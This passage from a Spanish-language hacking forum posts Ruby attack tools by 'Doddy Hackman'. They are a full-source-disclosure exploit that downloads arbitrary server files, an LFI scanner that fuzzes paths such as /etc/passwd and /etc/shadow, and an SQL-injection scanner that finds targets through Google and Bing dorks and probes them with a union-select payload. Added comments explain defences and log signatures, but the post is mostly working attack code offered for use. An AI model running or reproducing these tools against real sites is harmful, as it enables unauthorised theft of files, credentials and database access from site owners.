|
51
|
Programación / Scripting / [Ruby] FSD Exploit Manager 0.3
|
en: 4 Septiembre 2015, 23:01 pm
|
# Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure. El codigo :
#!usr/bin/ruby
#FSD Exploit Manager 0.3

require "open-uri"
require "net/http"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
# NOTE(review): the bare open() call is Kernel#open; it also treats a leading
# "|" in its argument as a command to run, so the argument must be trusted.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Print the usage line.
def uso
  print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

# Print the program banner.
def head
  print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end

# Print the closing banner and terminate the process with exit status 1.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  exit(1)
end

# Create a "logs" directory if it does not exist and make it the working
# directory, so files written later with a relative name land inside it.
def installer
  if not Dir.exists?("logs")
    Dir.mkdir "logs"
  end
  Dir.chdir("logs")
end

# Copy the content read from `file` into a local file called `name`.
# NOTE(review): `name` is used as given; the only caller passes the string the
# operator typed, so a value containing path separators resolves outside the
# logs directory.
def download(file,name)
  File.open(name, "wb") do |saved_file|
    open(file, "rb") do |read_file|
      saved_file.write(read_file.read)
    end
  end
end

# Check `target` and, on a positive result, loop reading file names from stdin.
# The check appends the basename of the target URL's path to the target and
# looks in the response for a header(... "Content-Disposition: attachment;"
# call, i.e. server-side source text coming back in the body.
# Defender note: the flaw being probed is a download endpoint that reads
# whatever file name the request supplies; restricting that parameter to an
# allow-list of downloadable files removes it, and requests that ask such an
# endpoint for its own script name are the signature to look for in logs.
def scan_fsd(target)
  print "\n[+] Scanning ...\n\n"
  path = File.basename(URI(target).path)
  code = toma(target+path)
  if code=~/header\((.*)Content-Disposition: attachment;/
    print "[+] Vulnerable !\n"
    # The loop ends only through copyright(), which exits the process.
    while(1)
      print "\n[+] Insert Filename : "
      filename = STDIN.gets.chomp
      if filename=="exit"
        copyright()
      else
        download(target+filename,filename)
        print "\n[+] Downloaded !\n"
      end
    end
  else
    print "[-] Not vulnerable\n"
  end
end

target = ARGV[0]

# The logs directory is created before the argument is checked.
installer()

head()

if !target
  uso()
else
  scan_fsd(target)
end

copyright()

#The End ?
Eso es todo.
|
|
|
52
|
Programación / Scripting / [Ruby] LFI Scanner 0.3
|
en: 21 Agosto 2015, 23:37 pm
|
# Un simple script en Ruby para scannear la vulnerabilidad LFI en una pagina. Version consola :
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# Print the usage line.
def uso
  print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

# Print the program banner.
def head
  print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

# Print the closing banner and terminate the process with exit status 1.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  exit(1)
end

# Test `web` for local file inclusion and print the result.
# Step 1 requests web + "'" and looks for the "No such file or directory in
# <b>...</b> on line" warning; the text between the <b> tags is printed as the
# disclosed server path.
# Step 2 requests web + each entry of `files` and prints every URL whose
# response does not contain "No such file or directory in". That includes the
# "Error" string toma() returns on a failed request, so a printed link is not
# by itself proof that the file was read.
# Defender note: both steps depend on the application echoing include()
# warnings to the client and on a request parameter reaching a file include
# unchanged. Turning error display off and mapping the parameter to an
# allow-list of includable files removes the signal and the flaw. A run shows
# up in access logs as a burst of requests with the fixed User-Agent whose
# parameter values are the paths below.
def scan(web)
  files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini',
           '/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab',
           '/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf',
           '/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0',
           '/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php',
           '/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log',
           '/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log',
           '/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log',
           '/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log',
           '/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log',
           '/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log',
           '/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd',
           '/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default',
           '/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log',
           '/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log',
           '/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
           '/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log',
           '/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log',
           '/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log',
           '/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
           'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf',
           '/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
           '/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf',
           '/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf',
           '/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf',
           '/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
           '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf',
           '/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
           '/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
           '/Volumes/webBackup/private/etc']
  print "\n[+] Testing the vulnerability LFI...\n\n"
  code = toma(web+"'")
  if code=~/No such file or directory in <b>(.*)<\/b> on line/
    fpd = $1
    print "[+] LFI Detected\n\n"
    print "[Full Path Discloure]: "+fpd+"\n"
    print "\n[+] Fuzzing Files\n\n"
    files.each do |file|
      code = toma(web+file)
      if not code=~/No such file or directory in/
        print "[Link] : "+web+file+"\n"
      end
    end
    print "\n[+] Finish\n"
    copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
  end
end

#

page = ARGV[0]

head()

if !page
  uso()
else
  scan(page)
end

copyright()

#The End ?
# Version Tk :
#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

#

# Main window: a target entry, a text widget used as a console, and a button.
window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text " Target : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry widget holding the URL to test.
web= TkEntry.new(window){
  background "black"
  foreground "cyan"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "cyan"
  text "Console"
  place('relx'=>0.4,'rely'=>0.2)
end

# Text widget that receives all output.
console =TkText.new(window) do
  background "black"
  foreground "cyan"
  width 30
  height 10
  place('relx'=>0.1,'rely'=>0.3)
end

# The button callback runs the whole scan inside the proc.
# The scan requests target + "'" and looks for the "No such file or directory
# in <b>...</b> on line" warning, then requests target + each listed path and
# reports every URL whose response lacks "No such file or directory in".
# Defender note: the check relies on include() warnings being shown to the
# client and on a request parameter reaching a file include unchanged. Turning
# error display off and mapping the parameter to an allow-list of includable
# files removes the signal and the flaw. A run appears in access logs as a
# burst of requests with the fixed User-Agent whose parameter values are the
# paths below.
TkButton.new(window) do
  text "Search"
  background "black"
  foreground "cyan"
  width 17
  activebackground "cyan"
  highlightbackground "cyan"
  command proc{
    # Rebinds the outer `web` (the entry widget) to the string it contains.
    web = web.value.to_s
    files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini',
             '/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab',
             '/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf',
             '/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0',
             '/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php',
             '/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log',
             '/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log',
             '/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log',
             '/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log',
             '/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log',
             '/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log',
             '/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd',
             '/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default',
             '/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log',
             '/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log',
             '/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log',
             '/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log',
             '/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log',
             '/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log',
             '/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log',
             'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf',
             '/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
             '/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf',
             '/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf',
             '/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf',
             '/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
             '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf',
             '/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default',
             '/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
             '/Volumes/webBackup/private/etc']
    console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
    code = toma(web+"'")
    if code=~/No such file or directory in <b>(.*)<\/b> on line/
      fpd = $1
      console.insert("end","[+] LFI Detected\n\n")
      console.insert("end","[Full Path Discloure]: "+fpd+"\n")
      console.insert("end","\n[+] Fuzzing Files\n\n")
      files.each do |file|
        code = toma(web+file)
        if not code=~/No such file or directory in/
          console.insert("end","[Link] : "+web+file+"\n")
        end
      end
      console.insert("end","\n[+] Finish")
    else
      console.insert("end","[-] Not Vulnerable to LFI")
    end
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
Una imagen : Eso es todo.
|
|
|
53
|
Programación / Scripting / [Ruby] SQLI Scanner 0.4
|
en: 7 Agosto 2015, 22:25 pm
|
# Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing. Version consola :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
# NOTE(review): the bare open() call is Kernel#open, which also treats a
# leading "|" in its argument as a command to run; in this script the argument
# is built from links scraped out of search-result pages.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# GET `web` over TLS and return the response body.
# NOTE(review): VERIFY_NONE turns certificate validation off, so the page that
# gets parsed is not authenticated. Unlike toma, errors are not rescued here.
def toma_ssl(web)
  uri = URI.parse(web)
  nave = Net::HTTP.new(uri.host, uri.port)
  nave.use_ssl = true
  nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end

# POST the body `arg` to the path of `web` and return the response body;
# returns "Error" on any exception. Not called anywhere in this script.
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

# For every URL in `pages` that contains "=", keep the text up to and
# including the last "=" (the first group is greedy); URLs without "=" are
# dropped. Returns the resulting array.
def cortar(pages)
  final = ""
  finales = []
  pages.flatten.each do |page|
    if page=~/(.*)=(.*)/
      parte1 = $1
      parte2 = $2
      final = parte1 + "="
      finales.push(final)
    end
  end
  return finales
end

# Query Google for `dork` and return the de-duplicated result links, taken
# from the url?q=...&sa part of each matched href.
# `pages` arrives as a String and bounds the loop through the range
# ("1"..pages); the start offset grows by 10 per iteration.
def google(dork,pages)
  links = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
    paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
    paginas.flatten.each do |pagina|
      partes = pagina
      if partes=~/url\?q=(.*)&sa/
        parte = $1
        link = URI::decode(parte)
        links.push(link)
      end
    end
  end
  links = links.uniq
  return links
end

# Second way of reading the Google result page, used by the callers when
# google() returns nothing: every URI found in the page is checked for a
# cache:<id>:<address>+ pattern and "http://" + address is collected.
def google_recursive(dork,pages)
  dork = dork.sub(/ /,"+")
  contador = 0
  guardo = []
  for i in ("1"..pages)
    contador+=10
    url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
    code = toma_ssl(url)
    links = URI::extract(code)
    links.each do |link|
      if link=~/cache:(.*?):(.*?)\+/
        link_final = "http://"+$2
        link_final = URI::decode(link_final)
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

# Query Bing for `dork` and return the de-duplicated links found in <h2> and
# <h3> result headings, skipping links under http://778802.r.msn.com/.
def bing(dork,pages)
  guardo = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
    links = code.scan(/<h2><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
    links = code.scan(/<h3><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

# Print the usage text.
def uso
  print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
  print "-search_bing : Find in Bing\n"
  print "-search_google : Find in Google\n"
  print "-scan_bing : Find SQLI in Bing\n"
  print "-scan_google : Find SQLI in Google\n"
  print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

# Print the program banner.
def head
  print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

# Print the closing banner.
def copyright
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages = ARGV[2]

head()

# The -search_* options only list links; the -scan_* options also probe them.
# Probe: each link is cut after its last "=" by cortar(), the fixed suffix
# below is appended, and a response containing the MySQL "different number of
# columns" error text is printed as [OK].
# Defender note: the test only succeeds where the application returns database
# error text to the client and builds its query from the raw parameter.
# Suppressing error output removes the signal and parameterised queries remove
# the flaw. The literal probe suffix together with the static User-Agent is a
# stable signature for access-log or WAF rules.
if !opcion or !dork or !pages
  uso()
else
  if opcion=="-search_bing"
    print "\n[+] Searching in Bing ...\n\n"
    links = bing(dork,pages)
    print "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      print "[-] Links not found\n"
    end
    links.flatten.each do |link|
      print "[+] Link : "+link+"\n"
    end
    print "\n[+] Finished\n"
  elsif opcion=="-search_google"
    print "\n[+] Searching in Google ...\n\n"
    links = google(dork,pages)
    if links.count.to_s=="0"
      print "[+] Searching in Google again ...\n\n"
      links = google_recursive(dork,pages)
    end
    print "[+] Pages Count : "+links.count.to_s
    if links.count.to_s=="0"
      print "[-] Links not found"
    end
    links.flatten.each do |link|
      print "[+] Link : "+link+"\n"
    end
    print "\n[+] Finished\n"
  elsif opcion=="-scan_bing"
    print "\n[+] Searching in Bing ...\n\n"
    links = cortar(bing(dork,pages))
    print "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      print "[-] Links not found\n"
    end
    links.flatten.each do |link|
      print "[+] Link : "+link
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          print " [OK]\n\a\a"
        else
          print " [FAIL]\n"
        end
      rescue
        print " [FAIL]\n"
      end
    end
    print "\n[+] Finished\n"
  elsif opcion=="-scan_google"
    print "\n[+] Searching in Google ...\n\n"
    links = cortar(google(dork,pages))
    if links.count.to_s=="0"
      print "[+] Searching in Google again ...\n\n"
      links = cortar(google_recursive(dork,pages))
    end
    print "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      print "[-] Links not found"
    end
    links.flatten.each do |link|
      print "[+] Link : "+link
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          print " [OK]\n\a\a"
        else
          print " [FAIL]\n"
        end
      rescue
        print " [FAIL]\n"
      end
    end
    print "\n[+] Finished\n"
  else
    print "[-] Bad Option"
  end
end

copyright()

#The End ?
# Version Tk para Google :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
# NOTE(review): the bare open() call is Kernel#open, which also treats a
# leading "|" in its argument as a command to run; in this script the argument
# is built from links scraped out of search-result pages.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# GET `web` over TLS and return the response body.
# NOTE(review): VERIFY_NONE turns certificate validation off, so the page that
# gets parsed is not authenticated. Unlike toma, errors are not rescued here.
def toma_ssl(web)
  uri = URI.parse(web)
  nave = Net::HTTP.new(uri.host, uri.port)
  nave.use_ssl = true
  nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end

# POST the body `arg` to the path of `web` and return the response body;
# returns "Error" on any exception. Not called anywhere in this script.
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

# For every URL in `pages` that contains "=", keep the text up to and
# including the last "=" (the first group is greedy); URLs without "=" are
# dropped. Returns the resulting array.
def cortar(pages)
  final = ""
  finales = []
  pages.flatten.each do |page|
    if page=~/(.*)=(.*)/
      parte1 = $1
      parte2 = $2
      final = parte1 + "="
      finales.push(final)
    end
  end
  return finales
end

# Query Google for `dork` and return the de-duplicated result links, taken
# from the url?q=...&sa part of each matched href.
# `pages` is a String and bounds the loop through the range ("1"..pages).
def google(dork,pages)
  links = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
    paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
    paginas.flatten.each do |pagina|
      partes = pagina
      if partes=~/url\?q=(.*)&sa/
        parte = $1
        link = URI::decode(parte)
        links.push(link)
      end
    end
  end
  links = links.uniq
  return links
end

# Second way of reading the Google result page, used by the button callback
# when google() returns nothing: every URI found in the page is checked for a
# cache:<id>:<address>+ pattern and "http://" + address is collected.
def google_recursive(dork,pages)
  dork = dork.sub(/ /,"+")
  contador = 0
  guardo = []
  for i in ("1"..pages)
    contador+=10
    url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
    code = toma_ssl(url)
    links = URI::extract(code)
    links.each do |link|
      if link=~/cache:(.*?):(.*?)\+/
        link_final = "http://"+$2
        link_final = URI::decode(link_final)
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

# Query Bing for `dork` and return the de-duplicated links found in <h2> and
# <h3> result headings. Defined here but not called by this Google variant.
def bing(dork,pages)
  guardo = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
    links = code.scan(/<h2><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
    links = code.scan(/<h3><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end

#

# Main window: dork and page-count entries, a text console and a button.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
  background "black"
  foreground "green"
  text " Dork : "
  place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
  background "black"
  foreground "green"
  width 25
  place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
  background "black"
  foreground "green"
  text " Pages : "
  place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
  background "black"
  foreground "green"
  width 25
  place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
  background "black"
  foreground "green"
  text "Console"
  place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
  background "black"
  foreground "green"
  width 30
  height 9
  place('relx'=>0.1,'rely'=>0.4)
end

# The button callback collects links from Google, cuts each after its last "="
# with cortar(), appends the fixed suffix below and reports [OK] when the
# response contains the MySQL "different number of columns" error text.
# Defender note: the test only succeeds where the application returns database
# error text to the client and builds its query from the raw parameter.
# Suppressing error output removes the signal and parameterised queries remove
# the flaw. The literal probe suffix together with the static User-Agent is a
# stable signature for access-log or WAF rules.
TkButton.new(window) do
  text "Search"
  background "black"
  foreground "green"
  width 17
  activebackground "green"
  highlightbackground "green"
  command proc{
    # Rebinds the outer `dork` and `pages` (entry widgets) to their strings.
    dork = dork.value.to_s
    pages = pages.value.to_s
    console.insert("end", "[+] Searching in Google ...\n\n")
    links = cortar(google(dork,pages))
    if links.count.to_s=="0"
      console.insert("end", "[+] Searching in Google again ...\n\n")
      links = cortar(google_recursive(dork,pages))
    end
    console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")
    if links.count.to_s=="0"
      console.insert("end", "[-] Links not found")
    end
    links.flatten.each do |link|
      console.insert("end", "[+] Link : "+link)
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          console.insert("end"," [OK]\n\a\a")
        else
          console.insert("end"," [FAIL]\n")
        end
      rescue
        console.insert("end", " [FAIL]\n")
      end
    end
    console.insert("end", "\n[+] Finished")
  }
  place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?
# Una imagen : Version Tk para Bing :
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

# Fetch `web` and return the response body.
# Every request carries the same hard-coded Firefox 25 User-Agent, so the
# traffic this script produces is easy to fingerprint in web-server logs.
# Any exception is swallowed and the literal string "Error" is returned.
# NOTE(review): the bare open() call is Kernel#open, which also treats a
# leading "|" in its argument as a command to run; in this script the argument
# is built from links scraped out of search-result pages.
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

# GET `web` over TLS and return the response body.
# NOTE(review): VERIFY_NONE turns certificate validation off, so the page that
# gets parsed is not authenticated. Not called by this Bing variant's callback.
def toma_ssl(web)
  uri = URI.parse(web)
  nave = Net::HTTP.new(uri.host, uri.port)
  nave.use_ssl = true
  nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end

# POST the body `arg` to the path of `web` and return the response body;
# returns "Error" on any exception. Not called anywhere in this script.
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end

# For every URL in `pages` that contains "=", keep the text up to and
# including the last "=" (the first group is greedy); URLs without "=" are
# dropped. Returns the resulting array.
def cortar(pages)
  final = ""
  finales = []
  pages.flatten.each do |page|
    if page=~/(.*)=(.*)/
      parte1 = $1
      parte2 = $2
      final = parte1 + "="
      finales.push(final)
    end
  end
  return finales
end

# Query Google for `dork` and return the de-duplicated result links.
# Defined here but not called by this Bing variant's callback.
def google(dork,pages)
  links = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador+=10
    code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
    paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
    paginas.flatten.each do |pagina|
      partes = pagina
      if partes=~/url\?q=(.*)&sa/
        parte = $1
        link = URI::decode(parte)
        links.push(link)
      end
    end
  end
  links = links.uniq
  return links
end

# Collect "http://" + address for every cache:<id>:<address>+ URI found in the
# Google result page. Defined here but not called by this Bing variant.
